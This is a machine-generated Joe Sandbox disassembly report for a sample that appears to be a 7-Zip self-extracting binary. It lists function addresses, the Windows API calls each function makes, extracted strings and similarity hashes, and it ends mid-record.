Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d
API String ID: 3387708999-2820892521
Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676

Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
wsprintfW.USER32 ref: 004045BB
GetFileAttributesW.KERNELBASE(?), ref: 004045D6

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603

??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B

Strings

(nA, xrefs: 004126DD, 004126E0

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$ExceptionThrow
String ID: (nA
API String ID: 2803161813-867891557
Opcode ID: ff3966214da990f3eec857a7cd77d999631e9245e926d80e80f01dca88b97972
Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
Opcode Fuzzy Hash: ff3966214da990f3eec857a7cd77d999631e9245e926d80e80f01dca88b97972
Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58

Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040CBC4
_CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7

Strings

PlA, xrefs: 0040CBD6

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: PlA
API String ID: 3773818493-1533977103
Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C

Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
String ID:
API String ID: 1642057587-0
Opcode ID: 9c23fe96df16c52cfdc0e27917211dc38b4a934b3376a8ee60c67e892c4a51fc
Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
Opcode Fuzzy Hash: 9c23fe96df16c52cfdc0e27917211dc38b4a934b3376a8ee60c67e892c4a51fc
Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98

Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

ExecuteFile, xrefs: 00401731

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@FileTime$??3@AttributesSystemlstrlen
String ID: ExecuteFile
API String ID: 1306139538-323923146
Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628

Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: e48a7097e89ab6672d4a1a829cf17096e5af604aff4887b8903ddd17a75771b8
Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
Opcode Fuzzy Hash: e48a7097e89ab6672d4a1a829cf17096e5af604aff4887b8903ddd17a75771b8
Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659

Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3

Strings

@, xrefs: 004026E6

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C

Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C828

Strings

lA, xrefs: 0040C7F2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@
String ID: lA
API String ID: 613200358-262130271
Opcode ID: 2706d47d74be015093c695225981c79f86210060680c130189faf4ccf942951b
Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
Opcode Fuzzy Hash: 2706d47d74be015093c695225981c79f86210060680c130189faf4ccf942951b
Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED

Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041017F
??3@YAXPAX@Z.MSVCRT(?), ref: 00410274

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: f1ab54605b7dccf154231dcdf4c392f830e7fdbf20b031498a990c1a6211f4ff
Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
Opcode Fuzzy Hash: f1ab54605b7dccf154231dcdf4c392f830e7fdbf20b031498a990c1a6211f4ff
Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D

Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 0d4d44cd39c449b8db83f9a0a129db4cf4655da94f728f0a6be5068cdd24361d
Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
Opcode Fuzzy Hash: 0d4d44cd39c449b8db83f9a0a129db4cf4655da94f728f0a6be5068cdd24361d
Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754

Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 7e6ba89204f8a758a8eee98ad7a5cb7fb7c45ca2aa42c986b371a9c0fd43346b
Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
Opcode Fuzzy Hash: 7e6ba89204f8a758a8eee98ad7a5cb7fb7c45ca2aa42c986b371a9c0fd43346b
Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768

Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
GetLastError.KERNEL32(?,?,?,?), ref: 0040C922

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64

Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4

Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041032E

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55

Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00401296

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59

Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
